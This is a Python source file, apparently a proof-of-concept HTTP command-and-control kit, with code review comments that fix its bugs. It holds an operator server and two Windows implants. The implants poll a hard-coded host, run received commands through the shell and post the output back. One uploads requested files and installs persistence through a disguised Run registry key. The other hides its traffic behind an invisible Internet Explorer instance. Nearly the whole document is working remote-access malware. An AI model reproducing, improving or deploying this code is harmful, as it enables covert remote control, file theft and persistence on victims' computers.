POC HTTP C&C
# HTTP SERVER
#--------------------------------------------
import BaseHTTPServer
import os, cgi
# Listener address for the C&C server; both clients below hard-code the same
# host.  Plain HTTP on port 80: nothing on this channel is encrypted or
# authenticated.
HOST_NAME, PORT_NUMBER = '172.16.20.201', 80
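class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Operator side of the POC C&C channel.

    GET  /      -> blocks on the operator console, then returns the typed
                   command as the response body (the implant polls this).
    POST /info  -> multipart upload from the implant ('grab' command); the
                   'file' part is written to a fixed path on disk.
    POST /      -> anything else: the body is command output, printed to
                   the console.

    Security notes (inherent to this POC, not changed here):
      - No authentication or transport security: any host that can reach the
        port can fetch commands, push fake "output" to the console, or upload
        a file that overwrites UPLOAD_PATH.
      - HTTPServer is single-threaded and do_GET blocks on raw_input, so every
        GET (including one from a scanner) stalls the server until the operator
        types something, and that command goes to whichever client asked.
    """

    # Where 'grab'bed files land.  Fixed name: each upload overwrites the last.
    UPLOAD_PATH = '/root/Desktop/1'

    def do_GET(self):
        """Serve the next operator command as the response body."""
        command = raw_input("Shell> ")
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(command)

    def do_POST(self):
        """Receive an uploaded file (/info) or command output (anything else)."""
        if self.path == '/info':
            self._receive_upload()
            return
        # Output channel: acknowledge first, then dump the body to the console.
        self.send_response(200)
        self.end_headers()
        # A missing Content-Length used to raise KeyError out of the handler.
        length = int(self.headers.getheader('Content-Length') or 0)
        print(self.rfile.read(length))

    def _receive_upload(self):
        """Handle POST /info: store the 'file' part of a multipart body.

        Always answers the request (200 / 400 / 500); the old handler returned
        without a response on error, leaving the implant's POST hanging.
        """
        status = 500
        try:
            raw_ctype = self.headers.getheader('content-type') or ''
            ctype, _ = cgi.parse_header(raw_ctype)
            if ctype != 'multipart/form-data':
                # Previously fell through to fs['file'] with `fs` unbound.
                print("[-] Unexpected POST request")
                status = 400
            else:
                form = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
                                        environ={'REQUEST_METHOD': 'POST'})
                with open(self.UPLOAD_PATH, 'wb') as out:
                    out.write(form['file'].file.read())
                status = 200
        except Exception as e:
            print(e)
        self.send_response(status)
        self.end_headers()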
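if __name__ == '__main__':
    # Plain (single-threaded) HTTPServer; see MyHandler for what that implies.
    server_class = BaseHTTPServer.HTTPServer
    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print('[!] Server is terminated')
    finally:
        # Release the listening socket however serve_forever() ends, not only
        # on Ctrl-C as before.
        httpd.server_close()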
#HTTP CLIENT
#--------------------------------------------
import requests
import subprocess
import os
import time
import shutil
import _winreg as wreg
import random
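def httpConnect():
    """Poll the C&C server for commands and post results back.

    Loops forever: GET the next command, act on it, POST the result, sleep 3s.
    Returns 1 when the operator sends 'terminate'; any other exception escapes
    to the caller's reconnect loop (unchanged behaviour).

    Command formats -- the first token decides.  The old code used substring
    tests ('cd' in command), so e.g. 'echo abcd' was parsed as a cd:
      terminate       -> return 1
      grab*<path>     -> upload <path> to /info (or report it is missing)
      persistence     -> copy putty.exe from cwd to %USERPROFILE%\\Documents
                         and register it under HKCU\\...\\Run
      cd <dir>        -> chdir and report the new cwd
      anything else   -> run through the shell, post stdout then stderr

    Security: the command is taken verbatim from a plaintext, unauthenticated
    HTTP response and handed to the shell -- anyone who can spoof or intercept
    the C&C address runs code on this host.
    """
    c2 = 'http://172.16.20.201'
    while True:
        command = requests.get(c2).text.strip()
        verb = command.split(None, 1)[0] if command else ''
        if verb == 'terminate':
            return 1
        elif command.startswith('grab*'):
            # Split once so a '*' inside the path survives; the old two-way
            # unpack raised ValueError on it.
            path = command.split('*', 1)[1]
            if os.path.exists(path):
                # Close the handle after the upload instead of leaking it.
                with open(path, 'rb') as fh:
                    requests.post(c2 + '/info', files={'file': fh})
            else:
                requests.post(url=c2, data='[-] Not able to find the file !')
        elif verb == 'persistence':
            _install_persistence(c2)
        elif verb == 'cd':
            # Split once so directories containing spaces survive.  A bare
            # 'cd' raises here and is absorbed by the reconnect loop, as before.
            directory = command.split(None, 1)[1]
            os.chdir(directory)
            requests.post(url=c2, data="[+] CWD is " + os.getcwd())
        else:
            proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # communicate() drains both pipes together and closes stdin: the
            # old sequential read() could deadlock on a chatty stderr, and a
            # command waiting on stdin hung forever.
            out, err = proc.communicate()
            requests.post(url=c2, data=out)
            requests.post(url=c2, data=err)
        time.sleep(3)


def _install_persistence(c2):
    """Copy putty.exe from cwd to %USERPROFILE%\\Documents and add an HKCU Run value."""
    # os.getcwd() has no trailing newline; the old .strip('/n') chopped a
    # trailing 'n' or '/' off real directory names.
    source = os.path.join(os.getcwd(), 'putty.exe')
    # Same value `set USERPROFILE` printed, without spawning a shell.
    destination = os.path.join(os.environ['USERPROFILE'], 'Documents', 'putty.exe')
    if not os.path.exists(destination):
        shutil.copyfile(source, destination)
    # KEY_SET_VALUE is all SetValueEx needs; KEY_ALL_ACCESS was over-broad.
    key = wreg.OpenKey(wreg.HKEY_CURRENT_USER,
                       r"Software\Microsoft\Windows\CurrentVersion\Run",
                       0, wreg.KEY_SET_VALUE)
    try:
        wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ, destination)
    finally:
        key.Close()
    requests.post(url=c2, data="[*] Persistence completed!")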
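# Reconnect loop.  Runs at module level: the implant starts polling as soon as
# this script executes and only exits when the operator sends 'terminate'.
while True:
    try:
        if httpConnect() == 1:
            break
    except Exception:
        # The bare `except:` it replaces also swallowed KeyboardInterrupt and
        # SystemExit, making the implant impossible to stop from the console.
        sleep_for = random.randrange(1, 10)
        print("[*] Error to connect C&C server trying to connect in: "
              + str(sleep_for) + " seconds...")
        # The delay was announced but never applied, so an unreachable C&C
        # produced a tight request loop.
        time.sleep(sleep_for)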
#IE COM CLIENT
#--------------------------------------------
from win32com.client import Dispatch
from time import sleep
import subprocess
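# Hidden Internet Explorer instance used as the HTTP transport (presumably so
# the beacon traffic originates from iexplore.exe -- the source does not say).
ie = Dispatch("InternetExplorer.Application")
ie.Visible = 0
dURL = "http://172.16.20.201"
flags = 0
targetFrame = ""
try:
    while True:
        ie.Navigate(dURL)
        # NOTE(review): ReadyState can still read 4 from the previous page for
        # an instant after Navigate(), so a stale command may be re-read.
        while ie.ReadyState != 4:
            sleep(1)
        # The response body is the raw command text; IE has already parsed
        # any markup in it, so innerHTML is what survives that parse.
        command = unicode(ie.Document.body.innerHTML).encode('ascii', 'ignore')
        print(' [+] Get command: ' + command)
        if 'terminate' in command:
            break
        # Executed verbatim from an unauthenticated plaintext response: see
        # the HTTP client above for the same caveat.
        proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        # communicate() drains stdout and stderr together and closes stdin;
        # the old stdout-only read() could deadlock on a chatty stderr.  Only
        # stdout is posted back, as before.
        out, _ = proc.communicate()
        ie.Navigate(dURL, flags, targetFrame, buffer(out))
        sleep(3)
finally:
    # Quit the hidden IE on any exit, not only on 'terminate', so an exception
    # does not leave an invisible iexplore.exe behind.
    ie.Quit()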